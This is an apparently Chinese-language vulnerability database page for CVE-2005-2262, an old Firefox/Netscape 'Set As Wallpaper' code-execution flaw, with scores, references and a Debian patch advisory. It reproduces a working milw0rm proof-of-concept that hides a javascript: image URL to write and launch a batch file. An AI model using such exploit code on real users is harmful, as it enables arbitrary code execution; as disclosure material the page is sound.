CVE-2005-2262
CVSS5.1
发布时间 :2005-07-13 00:00:00
修订时间 :2011-03-07 21:24:00
NMCOEP    

[原文]Firefox 1.0.3 and 1.0.4, and Netscape 8.0.2, allows remote attackers to execute arbitrary code by tricking the user into using the "Set As Wallpaper" (in Firefox) or "Set as Background" (in Netscape) context menu on an image URL that is really a javascript: URL with an eval statement, aka "Firewalling."


[CNNVD]Mozilla firefox/netscape 代码执行漏洞(CNNVD-200507-155)

        firefox及Netscape均为Web浏览器软件。
        Firefox 1.0.3、1.0.4版本及Netscape8.0.2版本存在代码执行漏洞。
        远程攻击者可诱使用户在浏览器中将一个图片设置为桌面背景,而实际上该图片的URL是一个包含 eval语句的jacascript:URL。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:mozilla:firefox:1.0.3Mozilla Firefox 1.0.3
cpe:/a:mozilla:firefox:1.0.4Mozilla Firefox 1.0.4

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:11097Firefox 1.0.3 and 1.0.4, and Netscape 8.0.2, allows remote attackers to execute arbitrary code by tricking the user into using the "Set As W...
oval:org.mitre.oval:def:100011Firefox Wallpaper Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2262
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2262
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200507-155
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2005/1075
(UNKNOWN)  VUPEN  ADV-2005-1075
http://www.mozilla.org/security/announce/mfsa2005-47.html
(UNKNOWN)  CONFIRM  http://www.mozilla.org/security/announce/mfsa2005-47.html
http://www.mikx.de/firewalling/
(UNKNOWN)  MISC  http://www.mikx.de/firewalling/
http://www.securityfocus.com/bid/14242
(UNKNOWN)  BID  14242
http://www.securiteam.com/securitynews/5ZP0E0UGAK.html
(UNKNOWN)  MISC  http://www.securiteam.com/securitynews/5ZP0E0UGAK.html
http://www.redhat.com/support/errata/RHSA-2005-586.html
(UNKNOWN)  REDHAT  RHSA-2005:586
http://www.novell.com/linux/security/advisories/2005_45_mozilla.html
(UNKNOWN)  SUSE  SUSE-SA:2005:045
http://www.novell.com/linux/security/advisories/2005_18_sr.html
(UNKNOWN)  SUSE  SUSE-SR:2005:018
http://www.networksecurity.fi/advisories/netscape-multiple-issues.html
(UNKNOWN)  MISC  http://www.networksecurity.fi/advisories/netscape-multiple-issues.html
http://www.ciac.org/ciac/bulletins/p-252.shtml
(UNKNOWN)  CIAC  P-252
http://secunia.com/advisories/16044
(UNKNOWN)  SECUNIA  16044
http://secunia.com/advisories/16043
(UNKNOWN)  SECUNIA  16043

- 漏洞信息

Mozilla firefox/netscape 代码执行漏洞
中危 资料不足
2005-07-13 00:00:00 2005-10-20 00:00:00
远程  
        firefox及Netscape均为Web浏览器软件。
        Firefox 1.0.3、1.0.4版本及Netscape8.0.2版本存在代码执行漏洞。
        远程攻击者可诱使用户在浏览器中将一个图片设置为桌面背景,而实际上该图片的URL是一个包含 eval语句的jacascript:URL。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.mozilla.com/products/

- 漏洞信息 (1102)

Mozilla Firefox <= 1.0.4 "Set As Wallpaper" Code Execution Exploit (EDBID:1102)
windows remote
2005-07-13 Verified
0 Michael Krax
[点击下载] [点击下载]
// Exploit by Michael Krax
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Firewalling - Proof-of-Concept</title>
<script>
function stopload() {
// in some cases the javascript url never stops to load
// therefore we force a stop after the real image got loaded
window.setTimeout("window.stop()",1000);
}
</script>
</head>
<body>
<div style="font-family:Verdana;font-size:11px;">

<div style="font-family:Verdana;font-size:15px;font-weight:bold;">
Firewalling - Proof-of-Concept</div>
<div style="width:600px">
The "Set As Wallpaper" dialog takes the image url as a parameter without validating it.
This allows to execute javascript in chrome and to run arbitrary code.
<br><br>
By using absolute positioning and the moz-opacity filter an attacker can easily fool the
user to think he is setting a valid image as wallpaper.
<br><br>
Right click on the image and choose "Set As Wallpaper". The demo requests
UniversalXPConnect rights, creates c:\booom.bat and launches the batch file
that shows a directoy listing in a dos box (Windows only).
<br><br>

<div style="position:relative; width:300px; height:250px;">
<img src="javascript:/*-----------------------------*/eval('if(document.location.href.
substr(0,6)==\'chrome\'){netscape.security.PrivilegeManager.enablePrivilege(\'
UniversalXPConnect\');file=Components.classes[\'@mozilla.org/file/local;1\'].
createInstance(Components.interfaces.nsILocalFile);file.initWithPath(\'c:\\\\
booom.bat\');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,
420);outputStream=Components.classes[\'@mozilla.org/network/file-output-stream;
1\'].createInstance(Components.interfaces.nsIFileOutputStream);outputStream.init
(file,0x04|0x08|0x20,420,0);output=\'@ECHO OFF\\n:BEGIN\\nCLS\\nDIR\\nPAUSE
\\n:END\';outputStream.write(output,output.length);outputStream.close();file.launch
();}else{void(0)}')" width="300" height="250" alt="" border="0" style="position:
absolute; left:0px; top:0px; z-index:2; -moz-opacity:0;">
<img src="http://www.milw0rm.com/images/logo.png" width="300" height="250" alt="" border="0" style="position:
absolute; left:0px; top:0px; z-index:1;" onload="stopload()">
</div>
</div>
</body>

</html>

# milw0rm.com [2005-07-13]
		

- 漏洞信息 (F39536)

Debian Linux Security Advisory 779-1 (PacketStormID:F39536)
2005-08-24 00:00:00
Debian  debian.org
advisory,web
linux,debian
CVE-2005-2260,CVE-2005-2261,CVE-2005-2262,CVE-2005-2263,CVE-2005-2264,CVE-2005-2265,CVE-2005-2266,CVE-2005-2267,CVE-2005-2268,CVE-2005-2269,CVE-2005-2270
[点击下载]

Debian Security Advisory DSA 779-1 - Several problems have been discovered in Mozilla Firefox, a lightweight web browser based on Mozilla.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 779-1                     security@debian.org
http://www.debian.org/security/                             Martin Schulze
August 20th, 2005                       http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : mozilla-firefox
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID         : CAN-2005-2260 CAN-2005-2261 CAN-2005-2262 CAN-2005-2263
                 CAN-2005-2264 CAN-2005-2265 CAN-2005-2266 CAN-2005-2267
                 CAN-2005-2268 CAN-2005-2269 CAN-2005-2270 
BugTraq ID     : 14242
Debian Bug     : 318061

Several problems have been discovered in Mozilla Firefox, a
lightweight web browser based on Mozilla.  The Common Vulnerabilities
and Exposures project identifies the following problems:

CAN-2005-2260

    The browser user interface does not properly distinguish between
    user-generated events and untrusted synthetic events, which makes
    it easier for remote attackers to perform dangerous actions that
    normally could only be performed manually by the user.

CAN-2005-2261

    XML scripts ran even when Javascript disabled.

CAN-2005-2262

    The user can be tricked to executing arbitrary JavaScript code by
    using a JavaScript URL as wallpaper.

CAN-2005-2263

    It is possible for a remote attacker to execute a callback
    function in the context of another domain (i.e. frame).

CAN-2005-2264

    By opening a malicious link in the sidebar it is possible for
    remote attackers to steal sensitive information.

CAN-2005-2265

    Missing input sanitising of InstallVersion.compareTo() can cause
    the application to crash.

CAN-2005-2266

    Remote attackers could steal sensitive information such as cookies
    and passwords from web sites by accessing data in alien frames.

CAN-2005-2267

    By using standalone applications such as Flash and QuickTime to
    open a javascript: URL, it is possible for a remote attacker to
    steal sensitive information and possibly execute arbitrary code.

CAN-2005-2268

    It is possible for a Javascript dialog box to spoof a dialog box
    from a trusted site and facilitates phishing attacks.

CAN-2005-2269

    Remote attackers could modify certain tag properties of DOM nodes
    that could lead to the execution of arbitrary script or code.

CAN-2005-2270

    The Mozilla browser familie does not properly clone base objects,
    which allows remote attackers to execute arbitrary code.

The old stable distribution (woody) is not affected by these problems.

For the stable distribution (sarge) these problems have been fixed in
version 1.0.4-2sarge2.

For the unstable distribution (sid) these problems have been fixed in
version 1.0.6-1.

We recommend that you upgrade your Mozilla Firefox packages.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge2.dsc
      Size/MD5 checksum:     1001 a5cf2fc8bc04662e6c192c15666011e4
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge2.diff.gz
      Size/MD5 checksum:   285974 45e66f5ddde0d5c016fd15268da0e522
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4.orig.tar.gz
      Size/MD5 checksum: 40212297 8e4ba81ad02c7986446d4e54e978409d

  Alpha architecture:

    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge2_alpha.deb
      Size/MD5 checksum: 11162656 4c8e579214a7bd4030303c6e33ec95f7
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge2_alpha.deb
      Size/MD5 checksum:   166698 027d4c7fddb899faff3ef9928864bb71
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge2_alpha.deb
      Size/MD5 checksum:    58528 2cff714da9bf45d1112621132f9fc940

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge2_amd64.deb
      Size/MD5 checksum:  9396736 0a28ce7a8f6f783f16c201fc0daf6e0a
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge2_amd64.deb
      Size/MD5 checksum:   161458 f9384873ae04a233001b37088abc510a
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge2_amd64.deb
      Size/MD5 checksum:    57012 b09a95b0f7587001540398f1a5fce173

  ARM architecture:

    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge2_arm.deb
      Size/MD5 checksum:  8216228 9ca98872228db6ba98cf5123d642fc4b
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge2_arm.deb
      Size/MD5 checksum:   152944 e0dc5a23ec713373753bcdf4e774c6f7
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge2_arm.deb
      Size/MD5 checksum:    52362 decd529d18ee714bcf2dbe5a82e53e37

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge2_i386.deb
      Size/MD5 checksum:  8887610 54e66239bff8195d09a76a8b0c65e096
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge2_i386.deb
      Size/MD5 checksum:   156664 e40d4387cdf627df5706e8a83f39640d
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge2_i386.deb
      Size/MD5 checksum:    53906 3bc7062690df1334a92eeeae36819ea0

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge2_ia64.deb
      Size/MD5 checksum: 11615046 5b41f9a2f87e8bc9017c94cd5b24b180
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge2_ia64.deb
      Size/MD5 checksum:   167044 67972c83f83c325861b21ff6486519e9
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge2_ia64.deb
      Size/MD5 checksum:    61720 86ecafea4b179e1739ea521402d2e53b

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge2_hppa.deb
      Size/MD5 checksum: 10264776 822d581c33a2628807fd955c1a72a66a
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge2_hppa.deb
      Size/MD5 checksum:   164432 bf6da3e624453a2b9669f889e56c0a76
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge2_hppa.deb
      Size/MD5 checksum:    57512 aa8ee4e91cdead5a455a70c3608ba85e

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge2_m68k.deb
      Size/MD5 checksum:  8166186 6ae9415318e2156f420b1926936f28b6
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge2_m68k.deb
      Size/MD5 checksum:   155562 54c6667bd665e961b5bd45c2b44df43d
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge2_m68k.deb
      Size/MD5 checksum:    53176 7c3a5484eb5d7155181653d25f927af1

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge2_mips.deb
      Size/MD5 checksum:  9917724 bc430e659978ea1114dc38c0982a5917
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge2_mips.deb
      Size/MD5 checksum:   154452 84399a208bda215a7983bc2f35f30bd2
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge2_mips.deb
      Size/MD5 checksum:    54188 f6ea0de213759e27da7dc5c06c6a5e57

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge2_mipsel.deb
      Size/MD5 checksum:  9802342 7e995ec5e6ee01d2ebc86d8e6e77d58a
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge2_mipsel.deb
      Size/MD5 checksum:   154006 110274d1994cfe33062244e28ee04fd6
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge2_mipsel.deb
      Size/MD5 checksum:    54012 83610c805d36e4cea229cab960a06e32

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge2_powerpc.deb
      Size/MD5 checksum:  8560170 ac40dd1ebef525009556eac5f5dbeff3
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge2_powerpc.deb
      Size/MD5 checksum:   155046 ab31c9d12c13b9e63a4af5f8babcb6ad
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge2_powerpc.deb
      Size/MD5 checksum:    56300 dab2c4918f383416a2418c2327988cc1

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge2_s390.deb
      Size/MD5 checksum:  9635642 2514b2a60f87aedff82c0d5c29f53f25
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge2_s390.deb
      Size/MD5 checksum:   162076 2a3fe0537ebeebc2ea9f1a3aa952279c
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge2_s390.deb
      Size/MD5 checksum:    56488 a914c752690bc8abcb6ad247d73dc041

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox_1.0.4-2sarge2_sparc.deb
      Size/MD5 checksum:  8649734 60765d2a2480a9aa5b45d288a2d6df65
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-dom-inspector_1.0.4-2sarge2_sparc.deb
      Size/MD5 checksum:   155298 9aab4bf6a3a7187243b60b044ed4d80c
    http://security.debian.org/pool/updates/main/m/mozilla-firefox/mozilla-firefox-gnome-support_1.0.4-2sarge2_sparc.deb
      Size/MD5 checksum:    52734 5af8d15d55aa1d13e80776e1079c2007


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFDBzGlW5ql+IAeqTIRAts4AKCWr8HJM0OMD1owrJnTK8Tp//+kkgCePaRv
AZJnTiHLIzbaxDV8362FXzA=
=+ShV
-----END PGP SIGNATURE-----

    

- 漏洞信息

17965
Mozilla Firefox "Set As Wallpaper" Dialog Arbitrary Script Execution
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

2005-05-03 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 1.0.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站